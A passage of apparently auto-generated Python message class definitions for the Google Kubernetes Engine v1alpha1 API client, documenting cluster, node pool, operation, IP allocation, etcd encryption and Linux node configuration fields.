r"""A ContainerProjectsZonesClustersDeleteRequest object.
Fields:
clusterId: Deprecated. The name of the cluster to delete. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster) of the cluster to delete.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1, required=True)
name = _messages.StringField(2)
projectId = _messages.StringField(3, required=True)
zone = _messages.StringField(4, required=True)
class ContainerProjectsZonesClustersGetRequest(_messages.Message):
r"""A ContainerProjectsZonesClustersGetRequest object.
Fields:
clusterId: Deprecated. The name of the cluster to retrieve. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster) of the cluster to retrieve.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1, required=True)
name = _messages.StringField(2)
projectId = _messages.StringField(3, required=True)
zone = _messages.StringField(4, required=True)
class ContainerProjectsZonesClustersListRequest(_messages.Message):
r"""A ContainerProjectsZonesClustersListRequest object.
Fields:
parent: The parent (project and location) where the clusters will be
listed. Specified in the format 'projects/*/locations/*'. Location "-"
matches all zones and all regions.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides, or
"-" for all zones. This field has been deprecated and replaced by the
parent field.
"""
parent = _messages.StringField(1)
projectId = _messages.StringField(2, required=True)
zone = _messages.StringField(3, required=True)
class ContainerProjectsZonesClustersNodePoolsDeleteRequest(_messages.Message):
r"""A ContainerProjectsZonesClustersNodePoolsDeleteRequest object.
Fields:
    clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the name field.
name: The name (project, location, cluster, node pool id) of the node pool
to delete. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool to delete. This field
has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1, required=True)
name = _messages.StringField(2)
nodePoolId = _messages.StringField(3, required=True)
projectId = _messages.StringField(4, required=True)
zone = _messages.StringField(5, required=True)
class ContainerProjectsZonesClustersNodePoolsGetRequest(_messages.Message):
r"""A ContainerProjectsZonesClustersNodePoolsGetRequest object.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the name field.
name: The name (project, location, cluster, node pool id) of the node pool
to get. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool. This field has been
deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1, required=True)
name = _messages.StringField(2)
nodePoolId = _messages.StringField(3, required=True)
projectId = _messages.StringField(4, required=True)
zone = _messages.StringField(5, required=True)
class ContainerProjectsZonesClustersNodePoolsListRequest(_messages.Message):
r"""A ContainerProjectsZonesClustersNodePoolsListRequest object.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the parent field.
parent: The parent (project, location, cluster id) where the node pools
will be listed. Specified in the format
'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the parent field.
"""
clusterId = _messages.StringField(1, required=True)
parent = _messages.StringField(2)
projectId = _messages.StringField(3, required=True)
zone = _messages.StringField(4, required=True)
class ContainerProjectsZonesGetServerconfigRequest(_messages.Message):
r"""A ContainerProjectsZonesGetServerconfigRequest object.
Fields:
name: The name (project and location) of the server config to get,
specified in the format 'projects/*/locations/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) to return operations for. This
field has been deprecated and replaced by the name field.
"""
name = _messages.StringField(1)
projectId = _messages.StringField(2, required=True)
zone = _messages.StringField(3, required=True)
class ContainerProjectsZonesOperationsGetRequest(_messages.Message):
r"""A ContainerProjectsZonesOperationsGetRequest object.
Fields:
name: The name (project, location, operation id) of the operation to get.
Specified in the format 'projects/*/locations/*/operations/*'.
operationId: Deprecated. The server-assigned `name` of the operation. This
field has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
name = _messages.StringField(1)
operationId = _messages.StringField(2, required=True)
projectId = _messages.StringField(3, required=True)
zone = _messages.StringField(4, required=True)
class ContainerProjectsZonesOperationsListRequest(_messages.Message):
r"""A ContainerProjectsZonesOperationsListRequest object.
Fields:
parent: The parent (project and location) where the operations will be
listed. Specified in the format 'projects/*/locations/*'. Location "-"
matches all zones and all regions.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) to return operations for, or `-`
for all zones. This field has been deprecated and replaced by the parent
field.
"""
parent = _messages.StringField(1)
projectId = _messages.StringField(2, required=True)
zone = _messages.StringField(3, required=True)
class CostManagementConfig(_messages.Message):
r"""Configuration for fine-grained cost management feature.
Fields:
enabled: Whether the feature is enabled or not.
"""
enabled = _messages.BooleanField(1)
class CreateClusterRequest(_messages.Message):
r"""CreateClusterRequest creates a cluster.
Fields:
cluster: A [cluster resource](/container-
engine/reference/rest/v1alpha1/projects.zones.clusters)
parent: The parent (project and location) where the cluster will be
created. Specified in the format 'projects/*/locations/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the parent field.
"""
cluster = _messages.MessageField('Cluster', 1)
parent = _messages.StringField(2)
projectId = _messages.StringField(3)
zone = _messages.StringField(4)
class CreateNodePoolRequest(_messages.Message):
r"""CreateNodePoolRequest creates a node pool for a cluster.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the parent field.
nodePool: The node pool to create.
parent: The parent (project, location, cluster id) where the node pool
will be created. Specified in the format
'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the parent field.
"""
clusterId = _messages.StringField(1)
nodePool = _messages.MessageField('NodePool', 2)
parent = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class CustomImageConfig(_messages.Message):
  r"""CustomImageConfig contains the information needed to create nodes using a custom image.
Fields:
image: The name of the image to use for this node.
imageFamily: The name of the image family to use for this node.
imageProject: The project containing the image to use for this node.
"""
image = _messages.StringField(1)
imageFamily = _messages.StringField(2)
imageProject = _messages.StringField(3)
class DailyMaintenanceWindow(_messages.Message):
r"""Time window specified for daily maintenance operations.
Fields:
duration: [Output only] Duration of the time window, automatically chosen
to be smallest possible in the given scenario.
startTime: Time within the maintenance window to start the maintenance
operations. It must be in format "HH:MM", where HH : [00-23] and MM :
[00-59] GMT.
"""
duration = _messages.StringField(1)
startTime = _messages.StringField(2)
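# Illustrative only: start_time uses the "HH:MM" GMT format described above,
# e.g. a daily window beginning at 03:00 GMT:
#
#   window = DailyMaintenanceWindow(startTime='03:00')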
class DatabaseEncryption(_messages.Message):
r"""Configuration of etcd encryption.
Enums:
StateValueValuesEnum: Denotes the state of etcd encryption.
Fields:
keyName: Name of CloudKMS key to use for the encryption of secrets in
etcd. Ex. projects/my-project/locations/global/keyRings/my-
ring/cryptoKeys/my-key
state: Denotes the state of etcd encryption.
"""
class StateValueValuesEnum(_messages.Enum):
r"""Denotes the state of etcd encryption.
Values:
UNKNOWN: Should never be set
ENCRYPTED: Secrets in etcd are encrypted.
DECRYPTED: Secrets in etcd are stored in plain text (at etcd level) -
this is unrelated to Google Compute Engine level full disk encryption.
"""
UNKNOWN = 0
ENCRYPTED = 1
DECRYPTED = 2
keyName = _messages.StringField(1)
state = _messages.EnumField('StateValueValuesEnum', 2)
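# Illustrative sketch, assuming keyword-argument construction: enabling etcd
# encryption with a CloudKMS key named like the example in the field
# documentation above (the key path is a placeholder).
#
#   encryption = DatabaseEncryption(
#       state=DatabaseEncryption.StateValueValuesEnum.ENCRYPTED,
#       keyName='projects/my-project/locations/global/keyRings/my-ring'
#               '/cryptoKeys/my-key',
#   )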
class DefaultSnatStatus(_messages.Message):
r"""DefaultSnatStatus contains the desired state of whether default sNAT
should be disabled on the cluster.
Fields:
disabled: Disables cluster default sNAT rules.
"""
disabled = _messages.BooleanField(1)
class DnsCacheConfig(_messages.Message):
r"""Configuration for NodeLocal DNSCache
Fields:
enabled: Whether NodeLocal DNSCache is enabled for this cluster.
"""
enabled = _messages.BooleanField(1)
class Empty(_messages.Message):
r"""A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to use it as the request
or the response type of an API method. For instance: service Foo {
rpc Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The
JSON representation for `Empty` is an empty JSON object `{}`.
"""
class FeatureConfig(_messages.Message):
r"""FeatureConfig is the configuration for a specific feature including the
definition of the feature as well as the tier in which it resides.
Enums:
FeatureValueValuesEnum: The feature that is being configured with this
value.
TierValueValuesEnum: The tier in which the configured feature resides.
Fields:
feature: The feature that is being configured with this value.
tier: The tier in which the configured feature resides.
"""
class FeatureValueValuesEnum(_messages.Enum):
r"""The feature that is being configured with this value.
Values:
DEFAULT_FEATURE: DEFAULT_FEATURE is the default zero value of the
Feature. This value is valid.
VERTICAL_POD_AUTOSCALER: The vertical pod autoscaling feature.
NODE_AUTO_PROVISIONING: The node auto provisioning feature.
BINARY_AUTHORIZATION: The binary authorization feature.
RESOURCE_LABELS: The resource labels feature.
USAGE_METERING: The GKE usage metering feature.
CLOUD_RUN_ON_GKE: The Cloud Run on GKE feature.
"""
DEFAULT_FEATURE = 0
VERTICAL_POD_AUTOSCALER = 1
NODE_AUTO_PROVISIONING = 2
BINARY_AUTHORIZATION = 3
RESOURCE_LABELS = 4
USAGE_METERING = 5
CLOUD_RUN_ON_GKE = 6
class TierValueValuesEnum(_messages.Enum):
r"""The tier in which the configured feature resides.
Values:
TIER_UNSPECIFIED: TIER_UNSPECIFIED is the default value. If this value
is set during create or update, it defaults to the project level tier
setting.
STANDARD: Represents the standard tier or base Google Kubernetes Engine
offering.
ADVANCED: Represents the advanced tier.
"""
TIER_UNSPECIFIED = 0
STANDARD = 1
ADVANCED = 2
feature = _messages.EnumField('FeatureValueValuesEnum', 1)
tier = _messages.EnumField('TierValueValuesEnum', 2)
class GcePersistentDiskCsiDriverConfig(_messages.Message):
r"""Configuration for the GCE PD CSI driver. This option can only be enabled
at cluster creation time.
Fields:
enabled: Whether the GCE PD CSI driver is enabled for this cluster.
"""
enabled = _messages.BooleanField(1)
class GetJSONWebKeysResponse(_messages.Message):
r"""GetJSONWebKeysResponse is a valid JSON Web Key Set as specififed in rfc
7517
Fields:
cacheHeader: OnePlatform automagically extracts this field and uses it to
set the HTTP Cache-Control header.
keys: The public component of the keys used by the cluster to sign token
requests.
"""
cacheHeader = _messages.MessageField('HttpCacheControlResponseHeader', 1)
keys = _messages.MessageField('Jwk', 2, repeated=True)
class GetOpenIDConfigResponse(_messages.Message):
r"""GetOpenIDConfigResponse is an OIDC discovery document for the cluster.
See the OpenID Connect Discovery 1.0 specification for details.
Fields:
cacheHeader: OnePlatform automagically extracts this field and uses it to
set the HTTP Cache-Control header.
claims_supported: Supported claims.
grant_types: Supported grant types.
id_token_signing_alg_values_supported: supported ID Token signing
Algorithms.
issuer: OIDC Issuer.
jwks_uri: JSON Web Key uri.
response_types_supported: Supported response types.
subject_types_supported: Supported subject types.
"""
cacheHeader = _messages.MessageField('HttpCacheControlResponseHeader', 1)
claims_supported = _messages.StringField(2, repeated=True)
grant_types = _messages.StringField(3, repeated=True)
id_token_signing_alg_values_supported = _messages.StringField(4, repeated=True)
issuer = _messages.StringField(5)
jwks_uri = _messages.StringField(6)
response_types_supported = _messages.StringField(7, repeated=True)
subject_types_supported = _messages.StringField(8, repeated=True)
class HorizontalPodAutoscaling(_messages.Message):
r"""Configuration options for the horizontal pod autoscaling feature, which
increases or decreases the number of replica pods a replication controller
has based on the resource usage of the existing pods.
Fields:
disabled: Whether the Horizontal Pod Autoscaling feature is enabled in the
cluster. When enabled, it ensures that metrics are collected into
Stackdriver Monitoring.
"""
disabled = _messages.BooleanField(1)
class HttpCacheControlResponseHeader(_messages.Message):
r"""RFC-2616: cache control support
Fields:
age: 14.6 response cache age, in seconds since the response is generated
directive: 14.9 request and response directives
expires: 14.21 response cache expires, in RFC 1123 date format
"""
age = _messages.IntegerField(1)
directive = _messages.StringField(2)
expires = _messages.StringField(3)
class HttpLoadBalancing(_messages.Message):
r"""Configuration options for the HTTP (L7) load balancing controller addon,
which makes it easy to set up HTTP load balancers for services in a cluster.
Fields:
disabled: Whether the HTTP Load Balancing controller is enabled in the
cluster. When enabled, it runs a small pod in the cluster that manages
the load balancers.
"""
disabled = _messages.BooleanField(1)
class IPAllocationPolicy(_messages.Message):
r"""Configuration for controlling how IPs are allocated in the cluster.
Fields:
allowRouteOverlap: If true, allow allocation of cluster CIDR ranges that
overlap with certain kinds of network routes. By default we do not allow
cluster CIDR ranges to intersect with any user declared routes. With
allow_route_overlap == true, we allow overlapping with CIDR ranges that
are larger than the cluster CIDR range. If this field is set to true,
then cluster and services CIDRs must be fully-specified (e.g.
`10.96.0.0/14`, but not `/14`), which means: 1) When `use_ip_aliases` is
true, `cluster_ipv4_cidr_block` and `services_ipv4_cidr_block` must
be fully-specified. 2) When `use_ip_aliases` is false,
`cluster.cluster_ipv4_cidr` must be fully-specified.
clusterIpv4Cidr: This field is deprecated, use cluster_ipv4_cidr_block.
clusterIpv4CidrBlock: The IP address range for the cluster pod IPs. If
this field is set, then `cluster.cluster_ipv4_cidr` must be left blank.
This field is only applicable when `use_ip_aliases` is true. Set to
blank to have a range chosen with the default size. Set to /netmask
(e.g. `/14`) to have a range chosen with a specific netmask. Set to a
[CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `10.96.0.0/14`) from the RFC-1918 private networks (e.g.
`10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`) to pick a specific
range to use.
clusterSecondaryRangeName: The name of the secondary range to be used for
the cluster CIDR block. The secondary range will be used for pod IP
addresses. This must be an existing secondary range associated with the
cluster subnetwork. This field is only applicable if use_ip_aliases is
true and create_subnetwork is false.
createSubnetwork: Whether a new subnetwork will be created automatically
for the cluster. This field is only applicable when `use_ip_aliases` is
true.
nodeIpv4Cidr: This field is deprecated, use node_ipv4_cidr_block.
nodeIpv4CidrBlock: The IP address range of the instance IPs in this
cluster. This is applicable only if `create_subnetwork` is true. Set
to blank to have a range chosen with the default size. Set to /netmask
(e.g. `/14`) to have a range chosen with a specific netmask. Set to a
[CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `10.96.0.0/14`) from the RFC-1918 private networks (e.g.
`10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`) to pick a specific
range to use.
servicesIpv4Cidr: This field is deprecated, use services_ipv4_cidr_block.
servicesIpv4CidrBlock: The IP address range of the services IPs in this
cluster. If blank, a range will be automatically chosen with the default
size. This field is only applicable when `use_ip_aliases` is true. Set
to blank to have a range chosen with the default size. Set to /netmask
(e.g. `/14`) to have a range chosen with a specific netmask. Set to a
[CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `10.96.0.0/14`) from the RFC-1918 private networks (e.g.
`10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`) to pick a specific
range to use.
servicesSecondaryRangeName: The name of the secondary range to be used
for the services CIDR block. The secondary range will be used for
service ClusterIPs. This must be an existing secondary range associated
with the cluster subnetwork. This field is only applicable when
use_ip_aliases is true and create_subnetwork is false.
subnetworkName: A custom subnetwork name to be used if `create_subnetwork`
is true. If this field is empty, then an automatic name will be chosen
for the new subnetwork.
tpuIpv4CidrBlock: The IP address range of the Cloud TPUs in this cluster.
If unspecified, a range will be automatically chosen with the default
size. This field is only applicable when `use_ip_aliases` is true, and
it must not be specified when the `tpu_use_service_networking` is
`true`. Unspecified to have a range chosen with the default size `/20`.
Set to /netmask (e.g. `/14`) to have a range chosen with a specific
netmask. Set to a [CIDR](http://en.wikipedia.org/wiki/Classless_Inter-
Domain_Routing) notation (e.g. `10.96.0.0/14`) from the RFC-1918 private
networks (e.g. `10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`) to pick
a specific range to use.
tpuUseServiceNetworking: Enable Cloud TPU's Service Networking mode. In
this mode, the CIDR blocks used by the Cloud TPUs will be allocated and
managed by Service Networking, instead of GKE. This field must be
`false` when `tpu_ipv4_cidr_block` is specified.
useIpAliases: Whether alias IPs will be used for pod IPs in the cluster.
This is used in conjunction with use_routes. It cannot be true if
use_routes is true. If both use_ip_aliases and use_routes are false,
then the server picks the default IP allocation mode.
"""
allowRouteOverlap = _messages.BooleanField(1)
clusterIpv4Cidr = _messages.StringField(2)
clusterIpv4CidrBlock = _messages.StringField(3)
clusterSecondaryRangeName = _messages.StringField(4)
createSubnetwork = _messages.BooleanField(5)
nodeIpv4Cidr = _messages.StringField(6)
nodeIpv4CidrBlock = _messages.StringField(7)
servicesIpv4Cidr = _messages.StringField(8)
servicesIpv4CidrBlock = _messages.StringField(9)
servicesSecondaryRangeName = _messages.StringField(10)
subnetworkName = _messages.StringField(11)
tpuIpv4CidrBlock = _messages.StringField(12)
tpuUseServiceNetworking = _messages.BooleanField(13)
useIpAliases = _messages.BooleanField(14)
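# Illustrative sketch, assuming keyword-argument construction: VPC-native IP
# allocation using the CIDR conventions described in the field documentation
# above (explicit pod range, netmask-only services range).
#
#   ip_policy = IPAllocationPolicy(
#       useIpAliases=True,
#       clusterIpv4CidrBlock='10.96.0.0/14',
#       servicesIpv4CidrBlock='/20',
#   )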
class IntraNodeVisibilityConfig(_messages.Message):
r"""IntraNodeVisibilityConfig contains the desired config of the intra-node
visibility on this cluster.
Fields:
enabled: Enables intra node visibility for this cluster.
"""
enabled = _messages.BooleanField(1)
class IstioConfig(_messages.Message):
r"""Configuration options for Istio addon.
Enums:
AuthValueValuesEnum: The specified Istio auth mode, either none, or mutual
TLS.
Fields:
auth: The specified Istio auth mode, either none, or mutual TLS.
csmMeshName: DEPRECATED: No longer used.
disabled: Whether Istio is enabled for this cluster.
"""
class AuthValueValuesEnum(_messages.Enum):
r"""The specified Istio auth mode, either none, or mutual TLS.
Values:
AUTH_NONE: auth not enabled
AUTH_MUTUAL_TLS: auth mutual TLS enabled
"""
AUTH_NONE = 0
AUTH_MUTUAL_TLS = 1
auth = _messages.EnumField('AuthValueValuesEnum', 1)
csmMeshName = _messages.StringField(2)
disabled = _messages.BooleanField(3)
class Jwk(_messages.Message):
r"""Jwk is a JSON Web Key as specified in RFC 7517
Fields:
alg: Algorithm.
crv: Used for ECDSA keys.
e: Used for RSA keys.
kid: Key ID.
kty: Key Type.
n: Used for RSA keys.
use: Permitted uses for the public keys.
x: Used for ECDSA keys.
y: Used for ECDSA keys.
"""
alg = _messages.StringField(1)
crv = _messages.StringField(2)
e = _messages.StringField(3)
kid = _messages.StringField(4)
kty = _messages.StringField(5)
n = _messages.StringField(6)
use = _messages.StringField(7)
x = _messages.StringField(8)
y = _messages.StringField(9)
class KalmConfig(_messages.Message):
r"""Configuration options for the KALM addon.
Fields:
enabled: Whether KALM is enabled for this cluster.
"""
enabled = _messages.BooleanField(1)
class KubernetesDashboard(_messages.Message):
r"""Configuration for the Kubernetes Dashboard.
Fields:
disabled: Whether the Kubernetes Dashboard is enabled for this cluster.
"""
disabled = _messages.BooleanField(1)
class LegacyAbac(_messages.Message):
r"""Configuration for the legacy Attribute Based Access Control
authorization mode.
Fields:
enabled: Whether the ABAC authorizer is enabled for this cluster. When
enabled, identities in the system, including service accounts, nodes,
and controllers, will have statically granted permissions beyond those
provided by the RBAC configuration or IAM.
"""
enabled = _messages.BooleanField(1)
class LinuxNodeConfig(_messages.Message):
r"""Parameters that can be configured on Linux nodes.
Messages:
SysctlsValue: The Linux kernel parameters to be applied to the nodes and
all pods running on the nodes. The following parameters are supported.
kernel.pid_max kernel.threads-max fs.inotify.max_queued_events
fs.inotify.max_user_instances fs.inotify.max_user_watches
net.core.netdev_budget net.core.netdev_budget_usecs
net.core.netdev_max_backlog net.core.rmem_default net.core.rmem_max
net.core.wmem_default net.core.wmem_max net.core.optmem_max
net.core.somaxconn net.ipv4.tcp_rmem net.ipv4.tcp_wmem net.ipv4.tcp_mem
net.ipv4.tcp_fin_timeout net.ipv4.tcp_keepalive_intvl
net.ipv4.tcp_keepalive_probes net.ipv4.tcp_keepalive_time
net.ipv4.tcp_max_orphans net.ipv4.tcp_max_syn_backlog
net.ipv4.tcp_max_tw_buckets net.ipv4.tcp_syn_retries
net.ipv4.tcp_tw_reuse net.ipv4.udp_mem net.ipv4.udp_rmem_min
net.ipv4.udp_wmem_min net.netfilter.nf_conntrack_generic_timeout
net.netfilter.nf_conntrack_max
net.netfilter.nf_conntrack_tcp_timeout_close_wait
net.netfilter.nf_conntrack_tcp_timeout_established
Fields:
sysctls: The Linux kernel parameters to be applied to the nodes and all
pods running on the nodes. The following parameters are supported.
kernel.pid_max kernel.threads-max fs.inotify.max_queued_events
fs.inotify.max_user_instances fs.inotify.max_user_watches
net.core.netdev_budget net.core.netdev_budget_usecs
net.core.netdev_max_backlog net.core.rmem_default net.core.rmem_max
net.core.wmem_default net.core.wmem_max net.core.optmem_max
net.core.somaxconn net.ipv4.tcp_rmem net.ipv4.tcp_wmem net.ipv4.tcp_mem
net.ipv4.tcp_fin_timeout net.ipv4.tcp_keepalive_intvl
net.ipv4.tcp_keepalive_probes net.ipv4.tcp_keepalive_time
net.ipv4.tcp_max_orphans net.ipv4.tcp_max_syn_backlog
net.ipv4.tcp_max_tw_buckets net.ipv4.tcp_syn_retries
net.ipv4.tcp_tw_reuse net.ipv4.udp_mem net.ipv4.udp_rmem_min
net.ipv4.udp_wmem_min net.netfilter.nf_conntrack_generic_timeout
net.netfilter.nf_conntrack_max
net.netfilter.nf_conntrack_tcp_timeout_close_wait
net.netfilter.nf_conntrack_tcp_timeout_established
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class SysctlsValue(_messages.Message):
r"""The Linux kernel parameters to be applied to the nodes and all pods
running on the nodes. The following parameters are supported.
kernel.pid_max kernel.threads-max fs.inotify.max_queued_events
fs.inotify.max_user_instances fs.inotify.max_user_watches
net.core.netdev_budget net.core.netdev_budget_usecs
net.core.netdev_max_backlog net.core.rmem_default net.core.rmem_max
net.core.wmem_default net.core.wmem_max net.core.optmem_max
net.core.somaxconn net.ipv4.tcp_rmem net.ipv4.tcp_wmem net.ipv4.tcp_mem
net.ipv4.tcp_fin_timeout net.ipv4.tcp_keepalive_intvl
net.ipv4.tcp_keepalive_probes net.ipv4.tcp_keepalive_time
net.ipv4.tcp_max_orphans net.ipv4.tcp_max_syn_backlog
net.ipv4.tcp_max_tw_buckets net.ipv4.tcp_syn_retries net.ipv4.tcp_tw_reuse
net.ipv4.udp_mem net.ipv4.udp_rmem_min net.ipv4.udp_wmem_min
net.netfilter.nf_conntrack_generic_timeout net.netfilter.nf_conntrack_max
net.netfilter.nf_conntrack_tcp_timeout_close_wait
net.netfilter.nf_conntrack_tcp_timeout_established
Messages:
AdditionalProperty: An additional property for a SysctlsValue object.
Fields:
additionalProperties: Additional properties of type SysctlsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a SysctlsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
sysctls = _messages.MessageField('SysctlsValue', 1)
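# Illustrative sketch, assuming keyword-argument construction: map-typed
# fields in apitools are expressed through their AdditionalProperty entries,
# so a single sysctl override looks roughly like this (the value is a
# placeholder).
#
#   linux_config = LinuxNodeConfig(
#       sysctls=LinuxNodeConfig.SysctlsValue(additionalProperties=[
#           LinuxNodeConfig.SysctlsValue.AdditionalProperty(
#               key='net.core.somaxconn', value='1024'),
#       ]))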
class ListClustersResponse(_messages.Message):
r"""ListClustersResponse is the result of ListClustersRequest.
Fields:
clusters: A list of clusters in the project in the specified zone, or
across all zones.
missingZones: If any zones are listed here, the list of clusters returned
may be missing those zones.
"""
clusters = _messages.MessageField('Cluster', 1, repeated=True)
missingZones = _messages.StringField(2, repeated=True)
class ListLocationsResponse(_messages.Message):
r"""ListLocationsResponse returns the list of all GKE locations and their
recommendation state.
Fields:
locations: A full list of GKE locations.
nextPageToken: Only return ListLocationsResponse that occur after the
page_token. This value should be populated from the
ListLocationsResponse.next_page_token if that response token was set
(which happens when listing more Locations than fit in a single
ListLocationsResponse). This is currently not used and will be honored
once we use pagination.
"""
locations = _messages.MessageField('Location', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class ListNodePoolsResponse(_messages.Message):
r"""ListNodePoolsResponse is the result of ListNodePoolsRequest.
Fields:
nodePools: A list of node pools for a cluster.
"""
nodePools = _messages.MessageField('NodePool', 1, repeated=True)
class ListOperationsResponse(_messages.Message):
r"""ListOperationsResponse is the result of ListOperationsRequest.
Fields:
missingZones: If any zones are listed here, the list of operations
returned may be missing the operations from those zones.
operations: A list of operations in the project in the specified zone.
"""
missingZones = _messages.StringField(1, repeated=True)
operations = _messages.MessageField('Operation', 2, repeated=True)
class ListUsableSubnetworksResponse(_messages.Message):
r"""ListUsableSubnetworksResponse is the response of
ListUsableSubnetworksRequest.
Fields:
nextPageToken: This token allows you to get the next page of results for
list requests. If the number of results is larger than `page_size`, use
the `next_page_token` as a value for the query parameter `page_token` in
the next request. The value will become empty when there are no more
pages.
subnetworks: A list of usable subnetworks in the specified network
project.
"""
nextPageToken = _messages.StringField(1)
subnetworks = _messages.MessageField('UsableSubnetwork', 2, repeated=True)
class LocalSsdVolumeConfig(_messages.Message):
r"""LocalSsdVolumeConfig is comprised of three fields, count, type, and
format. Count is the number of ssds of this grouping requested, type is the
interface type and is either nvme or scsi, and format is whether the disk is
to be formatted with a filesystem or left for block storage
Enums:
FormatValueValuesEnum: Format of the local SSD (fs/block).
Fields:
count: Number of local SSDs to use
format: Format of the local SSD (fs/block).
type: Local SSD interface to use (nvme/scsi).
"""
class FormatValueValuesEnum(_messages.Enum):
r"""Format of the local SSD (fs/block).
Values:
FORMAT_UNSPECIFIED: Default value
FS: File system formatted
BLOCK: Raw block
"""
FORMAT_UNSPECIFIED = 0
FS = 1
BLOCK = 2
count = _messages.IntegerField(1, variant=_messages.Variant.INT32)
format = _messages.EnumField('FormatValueValuesEnum', 2)
type = _messages.StringField(3)
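# Illustrative sketch, assuming keyword-argument construction: two NVMe local
# SSDs formatted with a filesystem.
#
#   ssd_config = LocalSsdVolumeConfig(
#       count=2,
#       type='nvme',
#       format=LocalSsdVolumeConfig.FormatValueValuesEnum.FS,
#   )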
class Location(_messages.Message):
r"""Location returns the location name, and if the location is recommended
for GKE cluster scheduling.
Enums:
TypeValueValuesEnum: Contains the type of location this Location is for.
Regional or Zonal.
Fields:
name: Contains the name of the resource requested. Specified in the format
'projects/*/locations/*'.
recommended: Recommended is a bool combining the drain state of the
location (i.e., has the region been drained manually?), and the stockout
status of any zone according to Zone Advisor. This will be internal only
for use by pantheon.
type: Contains the type of location this Location is for. Regional or
Zonal.
"""
class TypeValueValuesEnum(_messages.Enum):
r"""Contains the type of location this Location is for. Regional or Zonal.
Values:
LOCATION_TYPE_UNSPECIFIED: LOCATION_TYPE_UNSPECIFIED means the location
type was not determined.
ZONE: A GKE Location where Zonal clusters can be created.
REGION: A GKE Location where Regional clusters can be created.
"""
LOCATION_TYPE_UNSPECIFIED = 0
ZONE = 1
REGION = 2
name = _messages.StringField(1)
recommended = _messages.BooleanField(2)
type = _messages.EnumField('TypeValueValuesEnum', 3)
class MaintenancePolicy(_messages.Message):
r"""MaintenancePolicy defines the maintenance policy to be used for the
cluster.
Fields:
resourceVersion: A hash identifying the version of this policy, so that
updates to fields of the policy won't accidentally undo intermediate
changes (and so that users of the API unaware of some fields won't
